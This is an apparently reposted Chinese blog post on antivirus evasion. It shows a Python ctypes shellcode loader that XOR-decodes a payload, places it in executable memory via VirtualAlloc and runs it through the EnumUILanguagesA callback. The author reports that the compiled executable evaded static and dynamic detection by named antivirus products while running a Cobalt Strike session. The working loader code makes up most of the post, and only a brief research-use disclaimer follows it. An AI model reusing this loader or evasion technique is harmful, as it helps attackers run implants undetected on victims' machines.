前言
上一篇用的是 EnumDateFormatsA ,接着之前的内容继续往下测试。
正题
EnumUILanguagesA
EnumUILanguages 函数枚举系统上可用的 UI 语言。
![免杀 -- 回调函数[EnumUILanguagesA]](http://cn-sec.com/wp-content/uploads/2022/12/10-1671582001.png "免杀 -- 回调函数[EnumUILanguagesA]")
以EnumUILanguagesA调用shellcode
123456 import ctypes78 sc = b''.decode()9 key = 5010buf = [ord(sc[i]) ^ key for i in range(len(sc))]11buf = bytearray(buf)12kernel32 = ctypes.windll.kernel3213kernel32.VirtualAlloc.restype = ctypes.c_uint6414ptr = kernel32.VirtualAlloc(15ctypes.c_int(0),16ctypes.c_int(len(buf)),17ctypes.c_int(0x00001000),18ctypes.c_int(0x40)19)20buffer = (ctypes.c_char * len(buf)).from_buffer(buf)21kernel32.RtlMoveMemory(22ctypes.c_uint64(ptr),23buffer,24ctypes.c_int(len(buf))25)26kernel32.EnumUILanguagesA(ctypes.c_char_p(ptr), ctypes.c_int16(0), ctypes.c_int16(0))27282930kernel32.WaitForSingleObject(ctypes.c_uint64(ptr), ctypes.c_int(-1))31kernel32.CloseHandle(ptr)
py文件本身不报毒,截图中能够正常执行指令,动态也过了,是时候编译出exe测结果了。
![免杀 回调函数[EnumUILanguagesA]](http://cn-sec.com/wp-content/uploads/2022/12/4-1671582004.png "免杀 -- 回调函数[EnumUILanguagesA]")
编译过程未报毒,cs会话已清除,静态过免杀,运行编译后的文件测试免杀情况。
![免杀 回调函数[EnumUILanguagesA]](http://cn-sec.com/wp-content/uploads/2022/12/2-1671582006.png "免杀 -- 回调函数[EnumUILanguagesA]")
![免杀 -- 回调函数[EnumUILanguagesA]](http://cn-sec.com/wp-content/uploads/2022/12/0-1671582009.png "免杀 -- 回调函数[EnumUILanguagesA]")
到这里差不多就结束了,某绒过了,基于上一个某60未检出出异常估计也过了,到这里这个回调函数的利用就结束了。
关 注 有 礼
欢迎关注公众号:网络安全者
获取每日抽奖送书
![免杀 -- 回调函数[EnumUILanguagesA]](http://cn-sec.com/wp-content/uploads/2022/12/0-1671582010.jpeg "免杀 -- 回调函数[EnumUILanguagesA]")
本文内容来自网络,如有侵权请联系删除
![免杀 -- 回调函数[EnumUILanguagesA]](http://cn-sec.com/wp-content/uploads/2022/12/9-1671582012.jpeg "免杀 -- 回调函数[EnumUILanguagesA]")
原文始发于微信公众号(网络安全者):免杀 -- 回调函数[EnumUILanguagesA]
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论